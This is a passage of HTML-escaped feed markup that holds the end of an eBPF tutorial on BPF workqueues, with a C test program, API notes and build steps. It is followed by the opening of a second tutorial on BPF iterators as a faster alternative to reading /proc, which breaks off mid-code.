#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;fcntl.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;sys/resource.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"wq_simple.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;libbpf_print_level&lt;/span&gt; &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;va_list&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;vfprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;wq_simple_bpf&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;libbpf_set_print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Open and load BPF application */&lt;/span&gt;
    &lt;span class="n"&gt;skel&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;wq_simple_bpf__open_and_load&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to open and load BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach tracepoint handler */&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;wq_simple_bpf__attach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to attach BPF skeleton&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF workqueue program attached. Triggering unlink syscall...&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Create a temporary file to trigger do_unlinkat */&lt;/span&gt;
    &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/tmp/wq_test_file"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_CREAT&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;O_WRONLY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mo"&gt;0644&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;unlink&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/tmp/wq_test_file"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Give workqueue time to execute */&lt;/span&gt;
    &lt;span class="n"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Check results */&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Results:&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  main_executed = %u (expected: 1)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;main_executed&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"  wq_executed = %u (expected: 1)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;wq_executed&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;main_executed&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;bss&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;wq_executed&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;✓ Test PASSED!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;✗ Test FAILED!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;wq_simple_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the User-Space Code
&lt;/h3&gt;

&lt;p&gt;The userspace program orchestrates the test and verifies results. We use the skeleton API from libbpf which embeds the compiled BPF bytecode in a C structure, making loading trivial. The &lt;code&gt;wq_simple_bpf__open_and_load()&lt;/code&gt; call compiles (if needed), loads the BPF program into the kernel, and creates all maps in one operation.&lt;/p&gt;

&lt;p&gt;After loading, &lt;code&gt;wq_simple_bpf__attach()&lt;/code&gt; attaches the fentry program to &lt;code&gt;do_unlinkat&lt;/code&gt;. From this point, any unlink syscall will trigger our BPF program. We deliberately trigger this by creating and immediately deleting a temporary file. The &lt;code&gt;open()&lt;/code&gt; creates &lt;code&gt;/tmp/wq_test_file&lt;/code&gt;, we close the fd, then &lt;code&gt;unlink()&lt;/code&gt; deletes it. This deletion enters the kernel's &lt;code&gt;do_unlinkat&lt;/code&gt; function, triggering our fentry probe.&lt;/p&gt;

&lt;p&gt;Here's the critical timing aspect: workqueue execution is asynchronous. Our main BPF program schedules the work and returns immediately. The kernel queues the callback for later execution by a kernel worker thread. This is why we &lt;code&gt;sleep(1)&lt;/code&gt; - giving the workqueue time to execute before we check results. In production code, you'd use more sophisticated synchronization, but for a simple test, sleep is sufficient.&lt;/p&gt;

&lt;p&gt;After the sleep, we read global variables from the BPF program's &lt;code&gt;.bss&lt;/code&gt; section. The skeleton provides convenient access through &lt;code&gt;skel-&amp;gt;bss-&amp;gt;main_executed&lt;/code&gt; and &lt;code&gt;skel-&amp;gt;bss-&amp;gt;wq_executed&lt;/code&gt;. If both are 1, we know the synchronous path (fentry) and async path (workqueue callback) both executed successfully.&lt;/p&gt;

&lt;h2&gt;
  
  
  Understanding Workqueue APIs
&lt;/h2&gt;

&lt;p&gt;The workqueue API consists of three essential functions that manage the lifecycle. &lt;strong&gt;&lt;code&gt;bpf_wq_init(wq, map, flags)&lt;/code&gt;&lt;/strong&gt; initializes a workqueue handle, establishing the relationship between the workqueue and its containing map. The map parameter is crucial - it tells the verifier which map contains the value with the embedded &lt;code&gt;bpf_wq&lt;/code&gt; structure. The verifier uses this to ensure memory safety across async execution. Flags should be 0 in current kernels.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;bpf_wq_set_callback(wq, callback_fn, flags)&lt;/code&gt;&lt;/strong&gt; registers the function to execute asynchronously. The callback must have the signature &lt;code&gt;int callback(void *map, int *key, void *value)&lt;/code&gt;. The verifier checks this signature at load time and will reject programs with mismatched signatures. This type safety prevents common async programming errors. Flags should be 0.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;code&gt;bpf_wq_start(wq, flags)&lt;/code&gt;&lt;/strong&gt; schedules the workqueue to run. This returns immediately - your BPF program continues executing synchronously. The kernel queues the callback for execution by a worker thread in process context at some point in the future. The callback might run microseconds or milliseconds later depending on system load. Flags should be 0.&lt;/p&gt;

&lt;p&gt;The callback signature deserves attention. Unlike &lt;code&gt;bpf_timer&lt;/code&gt; callbacks which receive &lt;code&gt;(void *map, __u32 *key, void *value)&lt;/code&gt;, workqueue callbacks receive &lt;code&gt;(void *map, int *key, void *value)&lt;/code&gt;. Note the key type difference - &lt;code&gt;int *&lt;/code&gt; vs &lt;code&gt;__u32 *&lt;/code&gt;. This reflects the evolution of the API and must be matched exactly or the verifier rejects your program. The callback runs in process context, so it can safely perform operations that would crash in softirq context.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Use Workqueues vs Timers
&lt;/h2&gt;

&lt;p&gt;Choose &lt;strong&gt;bpf_timer&lt;/strong&gt; when you need microsecond-precision timing, operations are fast and non-blocking, you're updating counters or simple state, or implementing periodic fast-path operations like statistics collection or packet pacing. Timers excel at time-critical tasks that must execute with minimal latency.&lt;/p&gt;

&lt;p&gt;Choose &lt;strong&gt;bpf_wq&lt;/strong&gt; when you need to sleep or wait, allocate memory with &lt;code&gt;kzalloc()&lt;/code&gt;, perform device or network I/O, or defer cleanup operations that can happen later. Workqueues are perfect for the "fast path + slow path" pattern where critical operations happen immediately and expensive processing runs asynchronously. Examples include HID device I/O (keyboard macro injection with delays), async map cleanup (preventing memory leaks), security policy updates (querying external databases), and background processing (compression, encryption, aggregation).&lt;/p&gt;

&lt;p&gt;The fundamental trade-off is latency vs capability. Timers have lower latency but restricted capabilities. Workqueues have higher latency but full process context capabilities including sleeping and blocking I/O.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Navigate to the bpf_wq directory and build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_wq
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Makefile compiles the BPF program with the experimental workqueue features enabled and generates a skeleton header.&lt;/p&gt;

&lt;p&gt;Run the simple workqueue test:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./wq_simple
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;BPF workqueue program attached. Triggering unlink syscall...

Results:
  main_executed = 1 (expected: 1)
  wq_executed = 1 (expected: 1)

✓ Test PASSED!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The test verifies that both the synchronous fentry probe and the asynchronous workqueue callback executed successfully. If the workqueue callback didn't run, &lt;code&gt;wq_executed&lt;/code&gt; would be 0 and the test would fail.&lt;/p&gt;

&lt;h2&gt;
  
  
  Historical Timeline and Context
&lt;/h2&gt;

&lt;p&gt;Understanding how workqueues came to exist helps appreciate their design. In 2022, Benjamin Tissoires started work on HID-BPF, aiming to let users fix broken HID devices without kernel drivers. By 2023, he realized &lt;code&gt;bpf_timer&lt;/code&gt; limitations made HID device I/O impossible - you can't wait for hardware responses in softirq context. In early 2024, he proposed &lt;code&gt;bpf_wq&lt;/code&gt; as "bpf_timer in process context," collaborating with the BPF community on the design. The kernel merged workqueues in April 2024 as part of Linux v6.10. Since then, they've been used for HID quirks, rate limiting, async cleanup, and other sleepable operations.&lt;/p&gt;

&lt;p&gt;The key quote from Benjamin's patches captures the motivation perfectly: "I need something similar to bpf_timers, but not in soft IRQ context... the bpf_timer functionality would prevent me to kzalloc and wait for the device."&lt;/p&gt;

&lt;p&gt;This real-world need drove the design. Workqueues exist because device handling and resource management require sleepable, blocking operations that timers fundamentally cannot provide.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary and Next Steps
&lt;/h2&gt;

&lt;p&gt;BPF workqueues solve a fundamental limitation of eBPF by enabling sleepable, blocking operations in process context. Created specifically to support HID device handling where timing delays and device I/O are essential, workqueues unlock powerful new capabilities for eBPF programs. They enable the "fast path + slow path" pattern where performance-critical operations execute immediately while expensive cleanup and I/O happen asynchronously without blocking.&lt;/p&gt;

&lt;p&gt;Our simple example demonstrates the core workqueue lifecycle: embedding a &lt;code&gt;bpf_wq&lt;/code&gt; in a map value, initializing and configuring it, scheduling async execution, and verifying the callback runs in process context. This same pattern scales to production use cases like network rate limiting with async cleanup, security monitoring with external service queries, and device handling with I/O operations.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Original Kernel Patches:&lt;/strong&gt; Benjamin Tissoires' HID-BPF and bpf_wq patches (2023-2024)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Linux Kernel Source:&lt;/strong&gt; &lt;code&gt;kernel/bpf/helpers.c&lt;/code&gt; - workqueue implementation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Example adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 6.10+ for workqueue support. Complete source code available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>workqueue</category>
      <category>kernel</category>
    </item>
    <item>
      <title>eBPF Tutorial: BPF Iterators for Kernel Data Export</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 13 Jan 2026 07:18:49 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-bpf-iterators-for-kernel-data-export-137f</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-bpf-iterators-for-kernel-data-export-137f</guid>
      <description>&lt;p&gt;Ever tried monitoring hundreds of processes and ended up parsing thousands of &lt;code&gt;/proc&lt;/code&gt; files just to find the few you care about? Or needed custom formatted kernel data but didn't want to modify the kernel itself? Traditional &lt;code&gt;/proc&lt;/code&gt; filesystem access is slow, inflexible, and forces you to process tons of data in userspace even when you only need a small filtered subset.&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Iterators&lt;/strong&gt; solve. Introduced in Linux kernel 5.8, iterators let you traverse kernel data structures directly from BPF programs, apply filters in-kernel, and output exactly the data you need in any format you want. In this tutorial, we'll build a dual-mode iterator that shows kernel stack traces and open file descriptors for processes, with in-kernel filtering by process name - dramatically faster than parsing &lt;code&gt;/proc&lt;/code&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Iterators: The /proc Replacement
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: /proc is Slow and Rigid
&lt;/h3&gt;

&lt;p&gt;Traditional Linux monitoring revolves around the &lt;code&gt;/proc&lt;/code&gt; filesystem. Need to see what processes are doing? Read &lt;code&gt;/proc/*/stack&lt;/code&gt;. Want open files? Parse &lt;code&gt;/proc/*/fd/*&lt;/code&gt;. This works, but it's painfully inefficient when you're monitoring systems at scale or need specific filtered views of kernel data.&lt;/p&gt;

&lt;p&gt;The performance problem is systemic. Every &lt;code&gt;/proc&lt;/code&gt; access requires a syscall, kernel mode transition, text formatting, data copy to userspace, and then you parse that text back into structures. If you want stack traces for all "bash" processes among 1000 total processes, you still read all 1000 &lt;code&gt;/proc/*/stack&lt;/code&gt; files and filter in userspace. That's 1000 syscalls, 1000 text parsing operations, and megabytes of data transferred just to find a handful of matches.&lt;/p&gt;

&lt;p&gt;Format inflexibility compounds the problem. The kernel chooses what data to show and how to format it. Want stack traces with custom annotations? Too bad, you get the kernel's fixed format. Need to aggregate data across processes? Parse everything in userspace. The &lt;code&gt;/proc&lt;/code&gt; interface is designed for human consumption, not programmatic filtering and analysis.&lt;/p&gt;

&lt;p&gt;Here's what traditional monitoring looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find stack traces for all bash processes&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;pid &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="si"&gt;$(&lt;/span&gt;pgrep bash&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"=== PID &lt;/span&gt;&lt;span class="nv"&gt;$pid&lt;/span&gt;&lt;span class="s2"&gt; ==="&lt;/span&gt;
  &lt;span class="nb"&gt;cat&lt;/span&gt; /proc/&lt;span class="nv"&gt;$pid&lt;/span&gt;/stack
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This spawns &lt;code&gt;pgrep&lt;/code&gt; as a subprocess, makes a syscall per matching PID to read stack files, parses text output, and does all filtering in userspace. Simple to write, horrible for performance.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Programmable In-Kernel Iteration
&lt;/h3&gt;

&lt;p&gt;BPF iterators flip the model. Instead of pulling all data to userspace for processing, you push your processing logic into the kernel where the data lives. An iterator is a BPF program attached to a kernel data structure traversal that gets called for each element. The kernel walks tasks, files, or sockets, invokes your BPF program with each element's context, and your code decides what to output and how to format it.&lt;/p&gt;

&lt;p&gt;The architecture is elegant. You write a BPF program marked &lt;code&gt;SEC("iter/task")&lt;/code&gt; or &lt;code&gt;SEC("iter/task_file")&lt;/code&gt; that receives each task or file during iteration. Inside this program, you have direct access to kernel struct fields, can filter based on any criteria using normal C logic, and use &lt;code&gt;BPF_SEQ_PRINTF()&lt;/code&gt; to format output exactly as needed. The kernel handles the iteration mechanics while your code focuses purely on filtering and formatting.&lt;/p&gt;

&lt;p&gt;When userspace reads from the iterator file descriptor, the magic happens entirely in the kernel. The kernel walks the task list, calls your BPF program for each task passing the task_struct pointer. Your program checks if the task name matches your filter - if not, it returns 0 immediately with no output. If it matches, your program extracts the stack trace and formats it to a seq_file. All this happens in kernel context before any data crosses to userspace.&lt;/p&gt;

&lt;p&gt;The benefits are transformative. &lt;strong&gt;In-kernel filtering&lt;/strong&gt; means only relevant data crosses the kernel boundary, eliminating wasted work. &lt;strong&gt;Custom formats&lt;/strong&gt; let you output binary, JSON, CSV, whatever your tools need. &lt;strong&gt;Single read operation&lt;/strong&gt; replaces thousands of individual &lt;code&gt;/proc&lt;/code&gt; file accesses. &lt;strong&gt;Zero parsing&lt;/strong&gt; because you formatted the data correctly in the kernel. &lt;strong&gt;Composability&lt;/strong&gt; works with standard Unix tools since iterator output comes through a normal file descriptor.&lt;/p&gt;

&lt;h3&gt;
  
  
  Iterator Types and Capabilities
&lt;/h3&gt;

&lt;p&gt;The kernel provides iterators for many subsystems. &lt;strong&gt;Task iterators&lt;/strong&gt; (&lt;code&gt;iter/task&lt;/code&gt;) walk all tasks giving you access to process state, credentials, resource usage, and parent-child relationships. &lt;strong&gt;File iterators&lt;/strong&gt; (&lt;code&gt;iter/task_file&lt;/code&gt;) traverse open file descriptors showing files, sockets, pipes, and other fd types. &lt;strong&gt;Network iterators&lt;/strong&gt; (&lt;code&gt;iter/tcp&lt;/code&gt;, &lt;code&gt;iter/udp&lt;/code&gt;) walk active network connections with full socket state. &lt;strong&gt;BPF object iterators&lt;/strong&gt; (&lt;code&gt;iter/bpf_map&lt;/code&gt;, &lt;code&gt;iter/bpf_prog&lt;/code&gt;) enumerate loaded BPF programs and maps for introspection.&lt;/p&gt;

&lt;p&gt;Our tutorial focuses on task and task_file iterators because they solve common monitoring needs and demonstrate core concepts applicable to all iterator types.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Dual-Mode Task Iterator
&lt;/h2&gt;

&lt;p&gt;Let's build a complete example demonstrating two iterator types in one tool. We'll create a program that can show either kernel stack traces or open file descriptors for processes, with optional filtering by process name.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: task_stack.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Kernel task stack and file descriptor iterator */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cp"&gt;#define MAX_STACK_TRACE_DEPTH   64
